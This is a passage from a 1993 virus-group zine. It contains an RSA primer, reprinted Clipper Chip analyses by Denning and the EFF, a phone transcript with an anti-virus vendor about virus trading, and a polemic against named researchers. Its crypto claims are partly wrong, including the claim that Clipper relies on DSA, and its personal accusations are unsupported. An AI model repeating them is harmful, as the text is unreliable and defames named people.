`Digital Security' hence forth I introduce to you RSA. Rivest, Shamir, Adlemen (RSA) are the three mathematicians whom have patented the idea of `Public-Key' encryption, which by far isn't `just another' encryption method. Public-Key crypto-systems are often referred to as `asymmetric' crypto-systems. The now famous DES is of a form of `symmetric' crypto-systems. Symmetric, consists the use of a single key for decrypting and encrypting. Asymmetric on the other hand, consists of two keys; a public key used to encrypt, and a private key used to decrypt the cipher. (Cipher, is data that is encrypted) RSA algorithm work on the idea that prime numbers cannot be broken into a product of smaller factors. The algorithms work like so; first pick a number N that is the product of two prime numbers (call the two primes a and b so that N = a x b). Next, pick a number that will become your public key, and call it P; P _must_ be less than N. Now to encrypt a message M, you simple apply the following formula: C=M^P(mod N) % What the hells `mod'? % Public-key crypto-systems depend heavily on a number theory known as modular arithmetic or finite math. "Mod" can be said to be a remainder of a number. 13 mod 5 = 3, since that's the remainder when 13 is divided by 5. But the theory of Modular Math contains a pattern, a range, depending on the modular numbers. The modular of 50, are numbers from 0, 1, 2, ..., 49; the smallest being 0, and the largest is the modulus number minus 1. A less formal and probably easier-to-visualise is called the `clock arithmetic' If you restrict yourself to performing math by moving the hour hand clockwise (addition) or counterclockwise (subtraction) around the face of a clock, you'll soon see obvious patterns. Mostly, no matter how complex the math is, your answer will _always_ be some number in the range of 1 to 12, which are the number of hours on a standard clock. This actually is the basis of `finite' mathematics, whereby you are always working with integers and you're always working with a finite set of integers. Therefore, results of addition, subtraction, multiplication and division will _always_ land in the set defined by the modulus. (huh? how can that be?) As with the clock theory, the numbers "wrap around", meaning if the modular of 50 is a set of integers from 0 -> 49, once we reach 49 (the largest number) and add 1, we would get 0. The number 49 will wrap around to 0, and the reverse is true (0 wraps around to 49). The great think about modular math, is that it's finite, you don't have to worry about calculations yielding numbers that grow out of control, and also, since we are working with integers, you don't lose any information through round-off errors as you would with floating-point. Back to our formula; C=M^P(mod N) where C is the encrypted message, notice the message will be represented as numbers, you can use the ASCII value of each characters. See it's not hard to find two large prime numbers (a and b) but if I hand you their product (N), you will perhaps never find a and b again! So in RSA, you get a huge 512-1024 bit prime number which is the product of two large primes, a and b. The number N is made public, while a and b remains secret. And after the formula is completed the encrypted message cannot be cracked without factoring N! Now to decrypt the message we use the some-what same formula with different factors; M=C^p(mod N) (Note: This is lower case `p') where `p' (lower case) is the secret key. The secret key is calculated using the formula; P x p = 1(mod L) where L is the least common multiple of (a-1) and (b-1). In mathematical terminology, `p' is the multiplicative inverse of `P' in the modulus L. Algorithms are available for computing least common multiples and multiplicative inverses in modular arithmetic. You can look-up theses formulas for more understanding in almost any good college mathematic book, as I cannot teach you math in a matter of paragraphs. But I suspect most of the readers already know such basic mathematical skills. Anyhow, RSA has undergone quite a bit of research around its algorithm. Breaking the system requires the determination of `a' and `b', which are the factors of `N' (don't forget `N' and `P' are publicly known). Once you know `a' and `b', the factors of `N', you can easily calculate L. Knowing L and P, you can calculate `p' (lower case), and decrypt the ciphertext. This boils down to the task of factoring a number into its prime components, an ongoing popular problem in number theory that continues to occupy the minds and computers of mathematicians around the world. In October 1988, it took an international group of computer scientists nearly a month to factor a 100-digit number. More than 400 computers worked on the problem during idle hours to find the number's two factors. One 41 digits long, the other 60 digits long. In June 1990, another team factored a 155-digit number. The number was hand-picked to make the task easier, but it still took 275 years worth of ONE computer's time. To keep pace with even-faster computers RSA's inventors can simply add more digits to the system's key. ================================================================================================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Clipper Chip : New Government Standard? -N E- or New Government Joke?" Nu -N uK Nu By KE uK NuKE Supporters E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % New Government Standard or Joke? % Since the beginning of the new year, we have been waiting to hear from NIST if it will decide whether DES will remain as the standard encryption method used by federal agencies. The computer industry would like NIST to adopt the RSA technology, but that is not likely to happen. One reason; if RSA, a privately developed technology, becomes the new standard, the government will have to pay royalties for its use. And _even_ more important, the NSA does not want the government to back RSA encryption system. Why? "The NSA dislikes our system because its too hard to break!" "They clearly don't like what we do, but we're succeeding in spite of that." Are quoted statements explained by James Bidzos, president of RSA Data Security. And frankly, this is very true. RSA has been developed in the 1978, more that 15 years ago! After so many years of resisting Public-Key encryption systems, the government _finally_ endorsed one as a new National Standard! Unlike RSA, however, the government's DSA (Digital Signature Algorithm) depends on a single government-issue _prime number_. Where's the trust? I stated this in the previous info-journal, that the NSA would _never_ introduce an encryption system that is unbreakable, by them! The `Clipper Chip' uses the known to exist government's DSA system. What the government is saying is this: "Take a P! Not any P! this P!" (Read Article concerning RSA to understand RSA public-key algorithms) What good is it if we are `tricked' to use a P (prime number(s)) that the government issues? It only means that the government (NSA) wants the cipher to be, perhaps, unbreakable to the average public. But if NSA wishes to un-cipher your cipher, and you are using this government standard, it can _easily_ do so with easy. Its not that you don't trust anybody, its that you don't trust everybody. And `everybody' includes the government! Why should we let the government get the upper hand, again! We got exploited the first time with DES, and now its trying to do the exact same all over again. % Clipper Released % I take into grant that everybody has read the document on the Clipper Chip, that was release by The White House, office of the press secretary. If not; you may obtain a copy by calling up a NuKE-NeT system and looking through old messages posted in the General message base. Or you can get the file via an anonymous file transfer (ftp site) from csrc.ncsl.nist.gov in directory /pub/nistnews and via the NIST Computer Security BBS at 301-948-5717. A copyrighted article in the Friday May 7th, 1993 `Washington Post' describes a letter sent to President Clinton by 30+ major electronics companies and trade associations, expressing their concern about the Clipper chip. The article describes what the Clipper chip is, and explains that it was developed to allow encryption of voice and fax with a method for law enforcement to listen in when authorized. It summarizes the key aspects of the chip, and says: Since the White House proposed the plan three weeks ago, many in the computer and communications industries have responded with scepticism. Critics wonder how good the secret government technology really would be and worry that agencies might abuse it to tap calls without court orders. A NIST spokesman said they haven't read the letter yet, but commented that Clinton has made it clear he wants industry participation. Signers of the letter include IBM, AT&T, Lotus, Microsoft, McCaw Cellular and MCI, as well as the ACLU. The article notes the apparent conflict between AT&T signing the letter and its stated intention to use the chip. AT&T response was that they're just seeking clarification and do not oppose Clipper. Lets take into grant on the structure of Clipper and DES. DES differential cryptanalysis give you an 2^56 (56 bit key) rippling back through 16 stages. Clipper is said to use 32 rounds, where the key is extended to 2^80 (80 bits). Current personal computer desktop allows forced attacks of up to 2^50. This means that 2^80 for brute force key search is clearly unpractical for a few years to come. When DES was named as the standard 20 years ago, we clearly knew that the algorithms relied more on the S-boxes structure than on the key input. Enabling NSA to have a `backdoor' on DES, and the upper-hand in crypto technology. Clearly whatever computer power the NSA had 20 years ago, is surely _more_ power or equal power to what most desktop computers can do today. So surely, an 80 bit key can be easily broken via brute force attacks in perhaps the next 1-2 following years. But does the NSA contain an advantage that can `instantly' decipher the cipher code? If it depends on the government's DSA issue prime numbers, certainly that power exists. The movies `Sneakers' hints this issue, and we regard it as SciFi, fiction, entertainment purposes only! Look deeper, a lot deeper, isn't it hinting this theory exactly? I leave you with a technical summary of the Clipper Chip by Dorothy Denning, and a EFF analysis of the proposed Clipper Chip. Theses articles are distributed along the `As-is' basis, as that is how they were both publicly posted inside Internet Newsgroups. (sci.crypt) % The Clipper Chip : A Technical Summary % Newsgroups: sci.crypt Subject: THE CLIPPER CHIP: A TECHNICAL SUMMARY Date: 19 Apr 93 18:23:27 -0400 Distribution: world Organization: Georgetown University The following document summarizes the Clipper Chip, how it is used, how programming of the chip is coupled to key generation and the escrow process, and how law enforcement decrypts communications. Since there has been some speculation on this news group about my own involvement in this project, I'd like to add that I was not in any way involved. I found out about it when the FBI briefed me on Thursday evening, April 15. Since then I have spent considerable time talking with the NSA and FBI to learn more about this, and I attended the NIST briefing at the Department of Commerce on April 16. The document below is the result of that effort. Dorothy Denning --------------- THE CLIPPER CHIP: A TECHNICAL SUMMARY Dorothy Denning April 19, 1993 INTRODUCTION On April 16, the President announced a new initiative that will bring together the Federal Government and industry in a voluntary program to provide secure communications while meeting the legitimate needs of law enforcement. At the heart of the plan is a new tamper-proof encryption chip called the "Clipper Chip" together with a split-key approach to escrowing keys. Two escrow agencies are used, and the key parts from both are needed to reconstruct a key. CHIP STRUCTURE The Clipper Chip contains a classified 64-bit block encryption algorithm called "Skipjack." The algorithm uses 80 bit keys (compared with 56 for the DES) and has 32 rounds of scrambling (compared with 16 for the DES). It supports all 4 DES modes of operation. Throughput is 16 Mbits a second. Each chip includes the following components: the Skipjack encryption algorithm F, an 80-bit family key that is common to all chips N, a 30-bit serial number U, an 80-bit secret key that unlocks all messages encrypted with the chip ENCRYPTING WITH THE CHIP To see how the chip is used, imagine that it is embedded in the AT&T telephone security device (as it will be). Suppose I call someone and we both have such a device. After pushing a button to start a secure conversation, my security device will negotiate a session key K with the device at the other end (in general, any method of key exchange can be used). The key K and message stream M (i.e., digitized voice) are then fed into the Clipper Chip to produce two values: E[M; K], the encrypted message stream, and E[E[K; U] + N; F], a law enforcement block. The law enforcement block thus contains the session key K encrypted under the unit key U concatenated with the serial number N, all encrypted under the family key F. CHIP PROGRAMMING AND ESCROW All Clipper Chips are programmed inside a SCIF (secure computer information facility), which is essentially a vault. The SCIF contains a laptop computer and equipment to program the chips. About 300 chips are programmed during a single session. The SCIF is located at Mikotronx. At the beginning of a session, a trusted agent from each of the two key escrow agencies enters the vault. Agent 1 enters an 80-bit value S1 into the laptop and agent 2 enters an 80-bit value S2. These values serve as seeds to generate keys for a sequence of serial numbers. To generate the unit key for a serial number N, the 30-bit value N is first padded with a fixed 34-bit block to produce a 64-bit block N1. S1 and S2 are then used as keys to triple-encrypt N1, producing a64-bit block R1: R1 = E[D[E[N1; S1]; S2]; S1] . Similarly, N is padded with two other 34-bit blocks to produce N2 and N3, and two additional 64-bit blocks R2 and R3 are computed: R2 = E[D[E[N2; S1]; S2]; S1] R3 = E[D[E[N3; S1]; S2]; S1] . R1, R2, and R3 are then concatenated together, giving 192 bits. The first 80 bits are assigned to U1 and the second 80 bits to U2. The rest are discarded. The unit key U is the XOR of U1 and U2. U1 and U2 are the key parts that are separately escrowed with the two escrow agencies. As a sequence of values for U1, U2, and U are generated, they are written onto three separate floppy disks. The first disk contains afile for each serial number that contains the corresponding key part U1. The second disk is similar but contains the U2 values. The third disk contains the unit keys U. Agent 1 takes the first disk and agent 2 takes the second disk. The third disk is used to program the chips. After the chips are programmed, all information is discarded from the vault and the agents leave. The laptop may be destroyed for additional assurance that no information is left behind. The protocol may be changed slightly so that four people are in the room instead of two. The first two would provide the seeds S1 and S2, and the second two (the escrow agents) would take the disks back to the escrow agencies. The escrow agencies have as yet to be determined, but they will not be the NSA, CIA, FBI, or any other law enforcement agency. One or both may be independent from the government. LAW ENFORCEMENT USE When law enforcement has been authorized to tap an encrypted line, they will first take the warrant to the service provider in order to get access to the communications line. Let us assume that the tap is in place and that they have determined that the line is encrypted with Clipper. They will first decrypt the law enforcement block with the family key F. This gives them E[K; U] + N. They will then take a warrant identifying the chip serial number N to each of the key escrow agents and get back U1 and U2. U1 and U2 are XORed together to produce the unit key U, and E[K; U] is decrypted to get the session key K. Finally the message stream is decrypted. All this will be accomplished through a special black box decoder operated by the FBI. ACKNOWLEDGMENT AND DISTRIBUTION NOTICE. All information is based on information provided by NSA, NIST, and the FBI. Permission to distribute this document is granted. ------------------------------------------------------------------------------- % EFF Analysis of the Clipper Chip % April 16, 1993 INITIAL EFF ANALYSIS OF CLINTON PRIVACY AND SECURITY PROPOSAL The Clinton Administration today made a major announcement on cryptography policy which will effect the privacy and security of millions of Americans. The first part of the plan is to begin a comprehensive inquiry into major communications privacy issues such as export controls which have effectively denied most people easy access to robust encryption as well as law enforcement issues posed by new technology. However, EFF is very concerned that the Administration has already reached a conclusion on one critical part of the inquiry, before any public comment or discussion has been allowed. Apparently, the Administration is going to use its leverage to get all telephone equipment vendors to adopt a voice encryption standard developed by the National Security Agency. The so-called "Clipper Chip" is an 80-bit, split key escrowed encryption scheme which will be built into chips manufactured by a military contractor. Two separate escrow agents would store users' keys, and be required to turn them over law enforcement upon presentation of a valid warrant. The encryption scheme used is to be classified, but they chips will be available to any manufacturer for incorporation into their communications products. This proposal raises a number of serious concerns . First, the Administration appears to be adopting a solution before conducting an inquiry. The NSA-developed Clipper chip may not be the most secure product. Other vendors or developers may have better schemes. Furthermore, we should not rely on the government as the sole source for Clipper or any other chips. Rather, independent chip manufacturers should be able to produce chipsets based on open standards. Second, an algorithm can not be trusted unless it can be tested. Yet the Administration proposes to keep the chip algorithm classified. EFF believes that any standard adopted ought to be public and open. The public will only have confidence in the security of a standard that is open to independent, expert scrutiny. Third, while the use of the split-key, dual-escrowed system may prove to be a reasonable balance between privacy and law enforcement needs, the details of this scheme must be explored publicly before it is adopted. What will give people confidence in the safety of their keys? Does disclosure of keys to a third party waive individual's fifth amendment rights in subsequent criminal inquiries? In sum, the Administration has shown great sensitivity to the importance of these issues by planning a comprehensive inquiry into digital privacy and security. However, the "Clipper chip" solution ought to be considered as part of the inquiry, not be adopted before the discussion even begins. DETAILS OF THE PROPOSAL: ESCROW The 80-bit key will be divided between two escrow agents, each of whom hold 40 bits of each key. Upon presentation of a valid warrant, the two escrow agents would have to turn the key parts over to law enforcement agents. Most likely the Attorney General will be asked to identify appropriate escrow agents. Some in the Administration have suggested one non-law enforcement federal agency, perhaps the Federal Reserve, and one non-governmental organization. But, there is no agreement on the identity of the agents yet. Key registration would be done by the manufacturer of the communications device. A key is tied to the device, not to the person using it. CLASSIFIED ALGORITHM AND THE POSSIBILITY OF BACK DOORS The Administration claims that there are no back door means by which the government or others could break the code without securing keys from the escrow agents and that the President will be told there are no back doors to this classified algorithm. In order to prove this, Administration sources are interested in arranging for an all-star crypto cracker team to come in, under a security arrangement, and examine the algorithm for trap doors. The results of the investigation would then be made public. GOVERNMENT AS MARKET DRIVER In order to get a market moving, and to show that the government believes in the security of this system, the feds will be the first big customers for this product. Users will include the FBI, Secret Service, VP Al Gore, and maybe even the President. FROM MORE INFORMATION CONTACT: Jerry Berman, Executive Director Daniel J. Weitzner, Senior Staff Counsel Internet Address: eff@eff.org =============================================================================== ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Lies, Scandals, and Roomers of the Anti- -N E- Virus Community" Nu -N uK Nu By KE uK Alan Soloman, ARiSToTLe, Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu The following are the _exact_ conversation/interview between Aristotle, Rock Steady, and Alan Soloman, concerning the virus problem of today. The conversation was recorded by Rock Steady, the NSA (naturally), and Unitel whom alerted the RCMP because this was a 5 hour conference billed onto NuKE's own PBX, whom Unitel thought was suspicious so they killed our PBX! (Gezz talk about trust!) Nothing here has been recreated, this conversation was recorded on tape, rather in bad quality though, but nevertheless it will stand against any accusation of fabrication, which it is not! PS: Don't forget to read the conclusion at the end of the coversation, if you must read one thing, may it be the conclusion. % In the Beginning... there was light, then Rock, and of course Aristotle % NOTE: RS=Rock Steady ; AR=Aristotle ; SO=Alan Soloman ; ??= Mrs ? ??> Hello, may I help you? AR> Alan Soloman Please. ??> Who's calling? AR> John SO> Hello? AR> Hi, how you doing? If your not busy, ah.. you know Rock Steady is here on the phone with me. SO> Yeah AR> And I wanted to ask you a couple of things if I could. SO> Yeah AR> That article came out in VNI. [Virus News International; its a magazine] SO> Which one AR> The one that came out in the May issue. SO> Yeah AR> Who's the author of that? SO> Which article are you talking about? AR> The one that says `Back in Business' SO> ah, I don't know which is the article you are referring to. AR> ah, John , also known publicly as- SO> The trouble is ah, its been a few weeks since I read it. Does it have an author to it? AR> No. SO> Then its written by the editor. AR> Its written by Paul, okay I've talked to Paul about it. Okay I've twice seen in there whereby you have written articles and tossed me into it. SO> Toss you into what? AR> ah a couple of articles where you mention my name. SO> Did I say anything that wasn't true? AR> ah, that's not what I'm getting at. That's not what I'm calling about. What I'm calling about, is this particular article where they mention the school and everything. SO> Yeah AR> I spoke to Paul the other day, and he sent me a copy in the mail. SO> Yeah AR> So I was wondering, is there going to be a retraction on it? SO> Is it not true then? AR> Na- RS> What right gives you- SO> But you told me you were a student at- AR> No, no, no, about being Back in Business. It stated three times that I publicly stated that I was closing my system. SO> Well I'm confused- RS> That's a start SO> ah, I got a fax, no its an email, I forget now, this was a few months ago. Were you were offering viruses for sale. Is that not the case? AR> Na, that's not the case. SO> Something you posted on Fidonet. AR> I didn't know that I posted it! SO> Its good forgery, if its not you that did this. AR> Well, my points is- SO> Want me to call you back, this is costing you a fortune. AR> That's okay I can handle it. [Yeah sure RS is paying this 3-way] RS> AR> Reason I had Rock Steady call was, we were talking 'bout this as well. ah- SO> When I talk about your position, the position is that your positioned in William & Mary's college, or you graduated? AR> I graduated! SO> So your no longer with the college. AR> I graduated from the college, ah after this issue came out. But the point of it is this, it states in here real clearly that I'm Back in Business! And that I have forgotten my pledge, kay! I think I went back into business when I change to VR, there's nobody on my board! SO> So your not offering viruses any more? AR> I haven't since that day I told you. See I have ten people, believe or not, their all AV. SO> Who are there. AR> has some boys that like to call me from time to time. SO> What do you mean `his boys' AR> Some people he's got working for him. They call me up. SO> The trouble is, I don't know what you mean by the AV. AR> Well AntiVirus researchers, people that do beta testing for AntiVirus software. SO> The trouble is, anyone can call and say their AV. AR> Well okay, anybody can call themselves a virus writer. I', pr- SO> Ththth-that's why I'm asking you- AR> I'm really pissed off about this, okay. The way they mention my name in there, okay, they basically came out and said I was fire! This guy on the phone right now, knows for a fact that I've been doing research for this crap for a year now. And a- SO> Sorry, this guy you say, you mean Joe? [Joe Greco aka Rock Steady] AR> Yeah, okay... Joe? RS> Yeah AR> okay, anyway this stuff has been going on you know, and its been nothing but research. I told Paul Robison to call the school! And formally request that article and he can have it. SO> What's the phone number. AR> ah, okay, ah area code 804-221-4000 is the main number. SO> And who is the article with. AR> ah, Kenny Chang SO> So who's posting all the messages saying your selling viruses? AR> I don't know. SO> Because they seem to be coming- AR> Well I'll tell yeah RS> Do you have those posts we'd like to see them. SO> I could faxed them to you. Gimme a fax number AR> I don't have a fax number RS> Well I'm unwilling to give you my fax number. SO> Well I received them as a fax. AR> Well that's my point, the school is rather pissed off about this as well. SO> Allow me to fax them too? AR> well I dunno, if somebody's posting out there, I can take and change my system right now. I can phreak one of these password files from any front- door, and when I get in, I can get anybody's session password, and change my damn fido feed to anybody in the world. RS> Are to willing to receive a copy from the mail Aristotle, yes or no? AR> Sure I'll take a copy by the mail. RS> or I can make him send it the NuKE PO Box. AR> Sure, that's fine. RS> Okay Alan, I call you back in a week to give you our PO Box to receive that fax. SO> I could do that AR> Yeah, I'd like to have that. Now here's what it is...okay...I've been looking at this stuff upside down, and one-the-other, and there's a whole lot of thinks I was unhappy about. Alan I'm really pissed about this one. SO> What are you pissed about? AR> What am I pissed about! Damn Alan, you know. For a year know everyone knows that I'm here straighten this crap out. Between Sara Gordan's posting out there about VX-Net being an underground exchange network, and all this kind of horse-shit and everything. And this article coming out here, saying I'm a student in this school, now why did you have to put that in there? SO> Well because, what you say, was that you were doing this project. AR> But nobody mentioned that! SO> You said that! AR> But in the article it doesn't say anything about this damn research thing! The only thing that is said is that I'm a student at William and Mary's, It doesn't mention the fact that I'm doing research for the school! RS> Of course it all ends up that they pick out what they want, and paint a different picture of you! AR> I've always been pretty straight with you. You know Sara Gordon walks around saying, "I'll never log on to a bulletin board, never, never, never!" [Meaning a `Virus' exchange bulletin board] SO> Its been a few weeks since I read that article, can I call you back while I go get a copy of this article. Wait, I'll see if I can get it... SO> Sorry, I can't seem to find a copy in the house. See you called me at home, rather than the office. What did the article say? AR> It said, "John , also known publicly under the name Aristotle, sysop of The Black Axes BBS. One of several names used my Mr. John, recently announced, the self-imposed shut down of his bulletin board system. For a while it looked like there would be no more viruses for sale, or given away free, depending on who you were! ..... John's a student at William and Mary's college, has apparently forgotten his pledge and is back in business! AR> Now then, there's a hole lot of people here running around, saying all sorts of things. Lemme ask you something, a lady under the name Katy, no, Cary something. SO> Cary, Cary Lang? AR> Yes, she says she works for you! ok? SO> Not quite true. AR> Well she also states she was on my board, and she from Finland! SO> Well, Cary Lang is finish, doesn't work for me, works for a company, called "Land Vision" AR> Same place with that guy `Dire', Kaluco Janhontalo or something like this. Now this lady (Cary), was posting in the echoes, in response to some letter saying `John's boards down you know...' She comes out and says, "NO, its up, plenty of viruses, I was on there today." She used in her tag line, "Works for Dr. Alan Soloman" SO> Let me give you the accurate information on Cary, Cary isn't a lady, Cary is a man. AR> Pardon me. SO> Secondly, he works for a company called Land Vision, and sell our AntiVirus toolkit. AR> Well that lady- SO> He's not a lady. AR> Well okay, that person- SO> MAN AR> okay, that man was never on my board, the only fidish person on my board, is that guy named Janhontalo, okay. SO> Doesn't ring a bell. AR> Well, I'm kinda disturbed but it, cuz I believe when the school kicks back up, and they read this, huh.... The only person that knows about this right now is the dean. SO> Well I think, that if certain of my views were not true, then certainly we would do a retraction. AR> The chancellor of the college will be, very shortly, Margaret Thacher. SO> Really? AR> Oh Yes! She'll be the chancellor of the 1st of July, 1993. SO> So what is the true situation? So what you said was, that you took the Black Axes down? AR> No! What I said was the virus exchange, the virus stuff, is down! SO> So the Black axes is still running? AR> Yes. SO> Do you have any viruses on it? AR> For download, NO. There are 10 people that have access to that, on my board. SO> So there are no viruses for download? AR> Only 10 people have access to that, on my board! SO> Who are they? AR> ah, sure if you wanna do that, sure! You want me to name who's on there? SO> Yeah. AR> Some of these people are going to be mighty upset! These are AntiVirus software people. Joe knows these people call, I know when he writes something he doesn't go off to these people and tell them... AR> You know many don't trust my judgment, on whom I give theses viruses to, is what this all comes down to. How come then so many of my viruses have the S & S International logo in them? SO> Frankly, I'd like to know that too. [S&S International is Solomans Company.] AR> Well I already got the connection made! Well we've talked about David Chess, and he is suspected with trading with McAfee. SO> Suspect is the wrong word, I think he does! AR> Alright then, also we have a fellow by the name of Joseph Whales. Joe Whales is good buddies with guys in the NCSA, I got the whole NCSA collection! I got everything David Stang has put his hands on! SO> Most of it is junk, you know that! [NCSA Virus Collection] AR> Well there is more in there than just junk. SO> That's true, I'm not saying its all junk. I keep seeing these files beginning with exclamation marks, going round, and round, and round. AR> I got the entire collection, I got 8 megs of junk! SO> That's nothing I got 110 megs of junk. [Glad to see your proud of it!] AR> Now then, this guy on the phone with me right now (Joe) doesn't write viruses to put on peoples systems and NuKE the whole world! That's _not_ what we both do. I'm just interested in where they go, and what disturbs me is all the people running around out there, claiming this `Big Threat' You even stated in your articles that many in my collection were viruses, but there was an afoul lot of junk. SO> Yes, that right. AR> True, no problem with that. But that's the representative of what's going around the country! See, this is what is represented on what's out there. And its not that big a threat! SO> Its not that big of threat, for what? AR> ARCV is being busted and charge for some viruses they didn't write Alan! SO> Which viruses? RS> All of them! AR> Well they didn't write the McWhale, or the KoolMac... SO> Why do you say they're being busted for those viruses? AR> Because it listed in an article, by someone up there in Scotland Yard, saying if anybody got infected by any of these viruses, to contact them! SO> I don't know where Scotland Yard got the idea they wrote McWhale, I could have told them that! AR> All of them are MPC viruses, nothing more. SO> Well wait a minute, it depends on whom you believe is a member of ARCV! AR> Do they think I'm a member of ARCV? SO> Well Apache Warrior has been telling them that you are! AR> Hah, I'm in the United States, and your telling me I'm a member of ARCV! RS> ARCV is SOLELY England SO> Well that's what he has been telling them! Ask Apache Warrior. AR> Well I didn't know this. SO> Yes you did! AR> That I've been a member of ARCV? SO> You knew his been saying that! RS> Since when, do you want to clarify this. SO> Since when what? RS> You say John knows, what makes you so sure? SO> Because the last time I spoke to John 2-3 months ago.. AR> I know we talked about him, and I know he narced all his friends! But I don't think you told me, that he said I was a member of ARCV! RS> Alan do you have a copy of the ARCV news-journal? Their first news journal and only news journal, all members are listed inside there, and Aristotle is not listed inside there. SO> Do you have a copy of the second journal? RS> The second journal was never released. SO> ah, John's got a copy. AR> Of the Second Journal? RS> The second journal does not exist. SO> John's got a copy. AR> Tell me which one its in now, and I'll look it up! Is it in the collection I sent you? SO> Yeah. AR> Does it have me listed in that? SO> No, it doesn't. AR> This why I keep hearing feedback, of people wanting to extradite me to england. SO> Possibly, I can well imagine. AR> Based on what a 19 year old phreaker has said. And also now, with my name going around being `Back in Business'... SO> Well I don't know what he's basing that claim with, if he's got any files, or anything. I don't know. What I do know is that six months ago, he was facing fairly big trouble. AR> And because he's been talking... well you know... SO> He was facing big trouble, because he got caught stealing large amounts of telephone time from his next door neighbour. In an extraordinary stupid manner, by the way. AR> Yeah I know, he just went backdoor and plug a phone line into it... SO> There's no way he could of gotten away with that. AR> Humm, interesting. So how can I get Scotland Yard to call me? SO> You can call them, I'll give you the phone number. AR> Naa, wouldn't do any good. So like once this trail starts, they may bring me over? SO> I don't know, you can send them a letter. The person in charge of the case in Scotland Yard is, Inspector John Hoston. AR> humm okay. SO> I can understand why your pissed off. But Joe, what's your development in this? Why you part of the phone call? RS> Why not? SO> There's no reason why not. AR> I'll tell you why, cuz I asked him, as I'm putting an article in NuKE Info six. It basically explains my side, on how everything transpires. SO> Did Nowhere Man really write the NuKE Encryption Device, by himself! RS> Yes he did, why? SO> Well because I saw it. RS> Well that was just a Beta Release v.90. SO> No, I've seen the final! RS> uh? What version do you have? SO> oh sorry, we're not suppose to? RS> version .90. SO> No its version 1.00 RS> That does not exist! SO> I've got a thing that calls itself the N.E.D. v1.00, it mind be of course. RS> I'll tell you right now, it version .90 SO> Is there some bytes I can read out to help to identify it? RS> Not really, because version 1.00 changed dramatically. In most part this was the main concern of the conversation, we wanted to bring out. Surely, this is only 1/5 of the total conference, as a matter of fact this was the first hour of the conference, and by tone of voice, it was fairly hostile. But, we are not one to racially judge a person because of his ethnic surroundings, or occupation in life, so it would only be fair to say that Alan Soloman was fairly a reasonable man to talk to. Interesting enough Alan did remove his safeguard, so who said Soloman's package was unbeatable? The rest of the conversation, did focus on ideas, ideologies, morals and some of the unexpected problems due to this structured AntiVirus bludgeon. Problems you say? Who would have expected such a problem? The community responsible to `Clean-Up' the virus problem has done a good job in that, but who would have expected them to leave behind a muddy trail of destruction where they go? It all begins with the first Anti-Virus package, determined to detect and wipe-out any known virus out there. Note the word `KNOWN'. So basically, you would have to collect, if you may say so, and perhaps have people collecting for you, viruses so that you may add them to your Anti-Virus package to gain the cutting edge over your competitors. Now then, the remaining successful virus packages have somewhat localized, in a geographic state. McAfee Scan has dominated North America, Vet7 has dominated the Australia and Asian region. You can conclude that Frisk has gained a fair amount of support in Europe, as well as Solomans package. Now then, this is only because of geographic location. If someone in California notices a new virus, the first person he'll call and give this virus to is, naturally, McAfee. The same goes for Soloman and people crying in England (UK). Now, to gain that cutting edge, wouldn't you need all of those viruses across the world, so you may even begin to gain world-wide market share support? Naturally, so what do you do? You can form alliances with other Anti-Virus programmers, but that isn't enough, and perhaps unfair! Unfair is a sense, that an alliance with Soloman and McAfee would be to Soloman's advantage, surely McAfee covers a wider population and receives new viruses at a must faster pace compared to the England counter part. So we're stuck between a rock and a hard place, again. Hey, , why not form an association with members pertaining to all these continents, and bring upon our collection together to form an Even Bigger collection? Sure! Great idea! Lets call it NCSA! Yeah! Then another newfy pops up and screams, CARO! Yeah, another group. But what happens now? To our amazement, we have gentlemen, roaming the under- ground technodrome, mission: collect new viruses. Having no statute they will resort to anything in order to gain new viruses. Somehow, our "hero's" that claim to save us from the virus problem, are low-down, bottom of the food chain infantile, resorting to unmoral methods to gain viruses. huh? Explain? humm, I will use myself as an easy example. I, Rock Steady, along with Pure Energy manage a bulletin board known as Cybernetic Violence. The main head quarters of NuKE, we're looked upon as `evil-doers', misdirected youths, bullies that now know how to type, scum, satan's helpers I believe you get the picture? And yes, it isn't a pretty one for sure, you may call this harassment, as a matter of fact it _is_ harassment. Now then, where can you get the latest virus put out by the intellectual challenged mind? Of course, the mischievous virus groups. Oh no, this guy won't give me virus access unless I show him I'm `deserving' of it. Okay I got it, let me upload you my whole NCSA, virus collection... Get the picture? Yes, we all heard it before, I'm a deranged lair. The Anti- Virus community is _not_ maniacal to associate themselves with us. We all heard of Sara Gordon screaming out, `I never called an underground exchange board', she will never admit it. Nevertheless Sara Gordan holds the phone number of Cybernetic Violence, Black Axes, The Hell Pit, etc, etc. Sara doesn't associate herself with low-lives like ourselves, as she explains. Nevertheless, she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses and exclaims how easy it was to obtain virus access there. Now there's a contradiction. Now who are you going to believe? Rock Steady, with a record for hacking, and suspected of other cyber-crimes, or Sara Gordan with not even a bug-stain on her record? Wait, let me tell you some more. Sara Gordan is not totally `white', since Sara doesn't associate herself with `us', I guess the conversation we had concerning her wanting to invite a person called `Nowhere Man' to dinner was a figment of my imagination. Also, the crap she said to me, about getting her in contact with virus writers in Australia, was a figment of my vivid imagination. Come on Sara, I heard it and you said it. Of course, this is simply my word against yours. Son of a gun Sara, didn't you hear all them `clicking' noises during our conversation? There was someone else on the line Sara! Someone, that kept on receiving calls, and therefore he/she had to switch and answer the call, via MaBells `Calling Waiting' service. See I guess this isn't after all, just a figment of my imagination. Since I conference the call, my phone bill supports the fact that TWO calls were made at the same time from my number! One was to the alledged person in the background while the other was yours! (Sara) Oh yes, I'm a bored teenager derange liar wanting to bust balls. Frankly, no one admitted in NuKE is a teenager. Frankly I'm currently in a respectable banking position, nevertheless I still am pursuing my Masters in Mathematics, and may this even lead to a Ph.D., of course by then I'm expected to sprout out of my satanic puberty stage and into adulthood. Even though I'm way passed the legal adult age, may you still say its a hormone thing. Frankly, when just is not done and lies are tossed over to the public, discrediting our history, with your influence of power. Until that day of just, until that day of truth comes out, then that will be the day you will get rid of me. You see this isn't about me, this is about the you. This isn't 